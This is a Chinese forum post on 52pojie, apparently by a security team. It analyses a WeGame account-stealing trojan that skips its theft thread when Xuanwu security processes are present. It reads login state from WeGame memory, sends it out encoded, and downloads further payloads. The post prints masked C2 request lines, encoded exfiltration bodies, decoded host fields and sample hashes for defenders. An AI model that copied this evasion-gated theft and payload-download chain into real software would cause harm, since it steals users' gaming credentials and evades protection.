吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 549|回复: 2
上一主题 下一主题
收起左侧

[PC样本分析] 入侵环境中WeGame盗号木马对玄武安全规避行为分析(附后门专杀工具)

[复制链接]
跳转到指定楼层
楼主
sxaq 发表于 2026-8-19 17:47 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
近期,瞬犀安全技术团队在分析一个网吧场景下的盗号样本时,发现了一个值得关注的现象:样本并不是在所有环境中都会执行完整盗号逻辑。

盗号样本在检测到玄武安全卫士相关进程后,关键盗号线程没有被创建;而该样本在未检测到玄武安全卫士进程时,样本会继续创建盗号相关线程,读取 WeGame 进程内存中的登录态数据,并将编码后的数据发送至远端服务器。需要注意的是,相关入侵手法仍在持续更新,最新版专杀工具可通过以下链接获取:

StealthSched.D专杀工具:https://drive.weixin.qq.com/s?k=AAUASwfuAFgmUvhRWS

StealthSched.C专杀工具:https://drive.weixin.qq.com/s?k=AAUASwfuAFgBuGJcpw

从样本行为看,攻击者并非只依赖单一文件投放,而是通过启动项、DLL 加载、进程检测、内存读取和远端 Payload 下发等步骤,构成了一条较完整的盗号链路。下面我们结合样本执行过程,拆解其中几个关键节点。

一、启动项异常

样本入口出现在无盘环境的开机启动项中。这个位置比较敏感,因为它意味着程序可能随终端启动自动执行,并为后续下载、加载模块提供入口。



根据启动项中的业务地址,可以拿到一段任务配置。原始返回里已经能看到两个 DLL 任务,保存目录均指向 %temp%,加载模式为 disk。

原始任务配置

将 args 字段格式化后,任务结构更清楚:smhhmopw.dll 和 wrreyeqx.dll 是两个独立任务,并且都带有 hash 字段。后续解密后的样本哈希与这里的配置一致,说明这不是随机文件,而是服务端下发的一组模块化任务。



格式化后的任务配置





二、终端画像

第一个模块 smhhmopw.dll 的行为相对直接,主要是采集终端环境并尝试上报。它先通过命令行获取显卡信息,这类信息通常可用于判断机器类型、虚拟环境或分析环境。



随后,样本继续查询外网 IP。结合后面的上报行为看,这一步不是孤立动作,而是终端画像的一部分。



拿到终端信息后,样本尝试向远端上报。测试过程中,部分请求没有获得有效响应,原分析记录中也提到终端可能已被服务端拉黑。



为了排除单一环境问题,分析人员继续更换测试环境,但云电脑同样没有拿到合理响应。



之后又手动修改请求体中的 MAC 地址和 PC Name 继续测试,仍然无法得到有效响应。这个现象说明服务端可能存在更复杂的终端校验或黑名单逻辑。



三、进程判断

第二个模块 wrreyeqx.dll 是本文最关键的部分。它会检查 xclient.exe 和 xlauncher.exe 进程是否存在。检测结果会影响线程创建数量:存在相关进程时只创建线程1和线程3;不存在时则创建线程1、线程2、线程3。



线程1的行为较轻,只发送一个包后结束。真正和盗号强相关的是后面的线程2。



这意味着样本不是无差别执行全部能力,而是会根据安全环境选择性关闭高风险分支。检测到玄武相关进程时,线程2不会被创建,读取 WeGame 登录态的逻辑也随之被跳过。

四、登录态读取

线程2首先获取 TX_SSO_SHARE_INFO_0 相关内容。这一名称本身已经指向 WeGame 登录态相关信息。



随后,样本打开 wegame.exe 进程句柄,为后续读取进程内存做准备。



接下来是关键动作:样本多次调用 ReadProcessMemory 读取 WeGame 进程内存。原记录中提到,OpenProcess 和 ReadProcessMemory 被多次调用,其中 ReadProcessMemory 接近 5000 次。





读取到的数据并不会直接明文发送。样本中还能看到编码函数,负责将提取到的登录态字段转换成二进制流。



WeGame 登录态字段



编码函数执行后会返回一段处理后的数据。



下面是原文记录的完整编码数据。为了避免 Word 页面横向溢出,只做了自动换行处理,内容未删减。

编码后完整数据



完成编码后,样本向远端发送了一个长度约 3039 字节的数据包。



原文进一步确认,标签后的数据与前面编码后的 WeGame 登录态一致,因此线程2的功能可以明确归纳为:读取 WeGame 登录态,编码后发送到远端服务器。

标签数据说明

这里的标签后面的数据343F3D033E3C3A6E3B3E033E3A316E3A3B3C52393D303B04483A3A7A394A3B60314D39394B3D4D48313B3A4A304F

39483D39383C4D3E4D4B4F4D4A3C3A383C3F383E3C4B3C4F3D383B3C4D3B3A3E3B4C...跟上面经过编码的wegame登录态是一样的.所以线程2主要负责读取wegame的登录态,并编码发送到黑客服务器.

五、后续模块

线程3负责向远端继续请求资源。先看两处相关逻辑截图,能够看到请求构造和后续处理位置。



第二处截图补充了线程3后续分支,可以和上一张图连起来看。



原文还保留了一段请求参数,内容如下。

线程3请求参数

eVE6TTpacVpJSVFxZmZvfEhJYlFxfHl8KG9Nd3l5Ym9ROlpJb29ISWJRKEl8OjpJKElIUVFIUTpafG9JfEhicShaTUk6

KChJ

第一次请求失败,原分析推测可能是请求中包含时间字段,服务端做了时间校验。



重试后,远端返回了一个 PE 文件。



样本随后动态加载该 PE,并获取 DLL 导出函数。后续分析确认,这个 PE 实际为 DLL,在程序内部可称为 sitebyte.dll。



六、Payload下发

进入 sitebyte.dll 后,网络行为变得更清晰。原分析中记录它主要做了三类请求:查询外网 IP、上报主机信息、下载 Payload.exe。



第一类请求是通过 ip-api.com 查询当前外网 IP,响应结果如下。

外网 IP 查询请求与响应

GET http://ip-api.com/line/?fields=query

响应-本机的外网ip:

**.**.***.**

第二类请求是向远端 Info 接口上报主机信息。



Info 上报请求体

POST http://***.**.***.***:****/Info/BNANBOUQ/1224AC4A532D74791BAAC9BEB1E6B371/ HTTP/1.1

请求体:

IT8F/OmyN6pIayjw3928Nrrg3J9SUteFPRYj4N5ZNTPO8deeVgjJJNn+wFck3sK+/hN6g6Viwl/FmqBYXN6yRMHmoP4q

YbEvxe/TIl7axEa2lNf5X2mxqf4fLab3LH5NOKiif9LrS4tEECNMJ/HvGJDR5fs9UrY9vXYnrMuVvDS1mNfALQzEV7Gk

olBPpcN9xOXV+icJjFetpKI=

响应:

OK

第三类请求是从远端下载 Payload.exe。这一步说明样本具备继续加载后续能力的条件。



Payload 下载请求

GET http://***.**.***.***:****/BNANBOUQ/Payload.exe

响应:

为了确认 Info 接口上报内容,原分析继续定位编码函数,并还原其参数。明文字段包括标记号码、设备名称、设备 ID、系统版本、IP 地址等。

Info 上报字段明文

标记号码:BNANBOUQ

设备名称:DESKTOP-IRP9LDA

设备ID:A1DC69ED96792CD68734BC4188E26D51

目标进程:0

系统版本:Windows 10

IP地址:**.**.***.**

ACE:0

BTE:0

RKE:0

GG:0

QY:0



编码后的数据不是标准 base64。下面先保留截图,再保留原文中的完整编码结果。



编码后数据

Yjt/NnUuqzbU97RsQ0EgqiZ8QAPOzksZoYq/fELFqa9SbUsCypRVuEViXMu4Ql4iYo/mHzn+XsApcUq+t0df3VEHORWz

8l7GUAY9xMMyLtNQDEsSt/UvNWKDsTprsOLRpDQ+40531xfYjL/Qu21zhAxNeWehziqhIeq7MFc1IMVZDDtkr/0ryUY4

OcTAOV/hWGpMbMTOKro6CEuNsURd21JvBGzYzio=

最后,原文将请求2的请求体与还原后的明文字段对应起来,确认请求体就是前面主机信息编码后的结果。

请求2与明文字段对应

请求2,请求体为Yjt/NnUuqzbU97RsQ0EgqiZ8QAPOzksZoYq/fELFqa9SbUsCypRVuEViXMu4Ql4iYo/mHzn+XsApcUq+t0df3VEHORWz

8l7GUAY9xMMyLtNQDEsSt/UvNWKDsTprsOLRpDQ+40531xfYjL/Qu21zhAxNeWehziqhIeq7MFc1IMVZDDtkr/0ryUY4

OcTAOV/hWGpMbMTOKro6CEuNsURd21JvBGzYzio=就是刚才加密的数据,即

标记号码:BNANBOUQ

设备名称:DESKTOP-IRP9LDA

设备ID:A1DC69ED96792CD68734BC4188E26D51

目标进程:0

系统版本:Windows 10

IP地址:**.**.***.**

ACE:0

BTE:0

RKE:0

GG:0

QY:0



七、链路复盘

把上述行为连起来看,这个样本至少包含四个关键动作:通过启动项拉取任务配置,释放并加载加密 DLL,依据玄武相关进程选择是否执行盗号线程,读取 WeGame 登录态并编码外传,同时继续请求后续 Payload。

最值得关注的不是单个 API 调用,而是它的选择性执行逻辑。攻击者已经知道在安全环境中收敛敏感行为,以降低被发现和被拦截的概率。

因此,在排查同类样本时,建议重点关注异常启动项、%temp% 目录落地 DLL、游戏平台进程被异常打开句柄、高频 ReadProcessMemory、登录态字段编码外传、异常 C2 通信和 Payload 下载。

MD5 哈希

smhhmopw.dll   a325eed7703dfdfcf877f165a8d16996

smhhmopw.dll   decryptb093ce197e5e5cac104263a9e52ede02

wrreyeqx.dll       bc5fe41295aae2b02614d82ec1d7d2d6

wrreyeqx.dll       decrypt8c3cab172a00fe36afbf1ab1863606b4

图片12.png (144 KB, 下载次数: 0)

图片12.png

图片13.png (166.02 KB, 下载次数: 0)

图片13.png

图片14.png (141.32 KB, 下载次数: 0)

图片14.png

图片25.png (108.35 KB, 下载次数: 0)

图片25.png

图片30.png (135.02 KB, 下载次数: 0)

图片30.png

图片4.png (118.42 KB, 下载次数: 0)

图片4.png

图片6.png (98.57 KB, 下载次数: 0)

图片6.png

免费评分

参与人数 4吾爱币 +4 热心值 +3 收起 理由
努力加载中 + 1 + 1 热心回复!
Eric00 + 1 + 1 我很赞同!
weidechan + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
metucky + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

沙发
fightboy 发表于 2026-8-20 03:50
下一步更新 检测sunny模块
3#
luyefer 发表于 2026-8-20 11:25
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-8-21 03:02

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表